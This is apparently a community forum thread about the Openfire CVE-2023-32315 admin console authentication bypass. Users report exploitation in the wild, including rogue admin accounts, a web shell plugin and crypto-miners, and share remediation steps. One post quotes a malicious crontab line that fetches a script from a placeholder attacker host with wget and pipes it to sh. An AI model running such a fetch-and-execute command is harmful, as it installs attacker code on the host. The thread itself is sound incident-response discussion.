CVE-2023-32315: Openfire Administration Console authentication bypass

guus · May 23, 2023, 4:47pm

We’ve had an important security issue reported that affects all recent versions of Openfire. We’ve fixed it in the newly published 4.6.8 and 4.7.5 releases. We recommend people upgrade as soon as possible. More info, including mitigations for those who cannot upgrade quickly, is available in this security advisory: CVE-2023-32315: Administration Console authentication bypass.

Related to this issue, we have also made available updates to three of our plugins:

Random Avatar plugin version 1.1.0.
Monitoring Service plugin version 2.5.0.
HTTP File Upload plugin version 1.3.0.

If you’re using these plugins, it is recommended to update them immediately.

When you are using the REST API plugin, or any proprietary plugins, updating Openfire might affect availability of their functionality. Please find work-arounds in the security advisory.

If you have any questions, please stop by our community forum or our live groupchat.

For other release announcements and news follow us on Twitter and Mastodon.

claude_stabile · May 23, 2023, 7:09pm

I have just upgraded containers to 4.7.5 https://www.free-solutions.org So far so Good, congrats and respect for prompt efforts and reactive delivery as usual
Will update ASAP all our Openfire concerned sites. Big Thanks to the igniterealtime team !!!

patrickfixedit · May 29, 2023, 1:33pm

Thanks for the hard work!

mattv · June 16, 2023, 8:36am

This security bypass is already being actively exploited in the wild. I found additional admin users created and also a suspicious plugin installed, named “Product” with author “Surevine” (ironically credited for helping disclose this vuln):

Decompiling the plugin jar I found that it deploys a JSP-based remote web shell endpoint intended to allow attackers to execute arbitrary commands on the server. Attempting to delete the plugin from the Openfire UI fails; to remove the plugin completely you need to stop the Openfire service, delete the product.jar and product folder from the plugins directory manually, and restart.

Check the value of the admin.authorizedJIDs system property and look for suspicious additional usernames added. Edit the property to remove any that should not be there. Then delete the corresponding user accounts.

View the Openfire security audit log and the deployment of the plugin and additional admin logins will also be visible.

Best advice: Never open the Openfire admin web page ports 9090 and 9091 to the internet, and if you have to then make sure you firewall them to allow access only from authorized IP addresses.

mattv · June 16, 2023, 8:38am

Example from Security Audit Log showing unauthorized admin login deploying the web shell plugin:

guus · June 16, 2023, 8:48am

… and upgrade Openfire to a version that is not vulnerable.

Thanks for sharing this, Matt. It is troubling to see an exploit being used in the wild. Sadly, that was to be expected.

It probably goes without saying that Surevine, the company that helped us investigate and fix the issue in Openfire, is not the author of this exploit.

guus · June 16, 2023, 10:24am

2 posts were split to a new topic: Admin console password

guus · June 16, 2023, 10:24am

A post was merged into an existing topic: Admin console password

cybermaggedon · June 16, 2023, 1:44pm

Hey @mattv do you still have that JAR? Is it possible to get a copy? I’d like to get it handled in threat intel networks.

Any other info on use of the fake admin accounts would be appreciated also.

Happy to go direct comms: mark.adams@surevine.com

ajijun · June 17, 2023, 11:37am

Hai…

So today I have experiencing the same. Few suspicious additional usernames created and yea… few days back, There were few failed login attempt…

This is really bad. What do you think will happen after this ? anything that we should anticipate ? who are this attackers ?

cybermaggedon · June 19, 2023, 10:07am

@ajijun unfortunately, the vulnerability allows creation of admin accounts which potentially provides a great deal of access. For remediation, there has been advice on actions to take on this forum above.

Given that this incident is still unfolding, we have to be careful what is said on this forum, the information we share here is available to malicious actors as well as the OpenFire community.

If anyone on this forum makes use of threat intelligence or cybersecurity partners, and would like me to share the information I have directly with them, please email me, mark.adams@surevine.com. Others on this thread may also have information available to share.

@ajijun if you have any information about the intrusion e.g. login logs or such, I would be very interested to get hold of that information if you are able to share (by email).

Orchard22 · June 21, 2023, 6:35pm

I have a copy… Do you still need it ?

guus · June 21, 2023, 6:56pm

Ales · June 22, 2023, 6:50am

In my case (Ubuntu server) it installed a crypto-miner malware “kdevtmpfsi” and “kinsing” which used entire CPU.

Lots of new users in Openfire and in Security Audit Log many times this:

openfiresupport uploaded plugin plugin.jar
openfiresupport deleted plugin product
OpenfireSupport Successful admin console login attempt

I had to:

stop the openfire service, delete that plugin from /var/lib/openfire/plugins
delete all new users
upgrade to openfire 4.7.5

also get rid of that malware:

killall kdevtmpfsi*; killall kinsing*;
delete files from /tmp directory

It seems clean since then.

Ales · June 22, 2023, 7:52am

I forgot:

and block all access other than from my gateway IP address (1.2.3.4)

iptables -I INPUT \! --src 1.2.3.4 -m tcp -p tcp --dport 9090 -j DROP
iptables -I INPUT \! --src 1.2.3.4 -m tcp -p tcp --dport 9091 -j DROP

cybermaggedon · June 22, 2023, 8:23am

Sure, can you send to email above?

Encrypted ZIP and send me the password would hopefully make it past malware scanners.

embracore · August 24, 2023, 1:30pm

I know it’s a little late, but it also creates an entry in openfire’s crontab that download and run a script:
File: /var/spool/cron/crontabs/openfire
Entry: * * * * * wget -q -O - http_bad_guy_server/unk.sh | sh > /dev/null 2>&1

I’ve made a copy of the executables (kdevtmpfsi, kinsing) and plugin files to further analysis

wroot · August 24, 2023, 6:33pm

This CVE even made on CISA must fix list. 3 months late. But i guess there were more exploitations.
https://www.cisa.gov/news-events/alerts/2023/08/24/cisa-adds-two-known-exploited-vulnerabilities-catalog

gaurav8 · August 25, 2023, 9:28am

Hello

As a mitigation step for this vulnerability, we plan to delete the plugins\admin\webapp\WEB-INF\lib\admin-jsp.jar which will not allow anyone to access the admin console. Can you please suggest that this step will actually prevent this vulnerability? We also have an upgrade to the latest version in our plans but that will take some time so we wanted to know if we delete admin-jsp.jar it will prevent this vulnerability.

guus · August 25, 2023, 4:25pm

The CVE lists a number of mitigations, and is pretty precise in what effects they have. Why are you trying to mitigate this problem in a different way?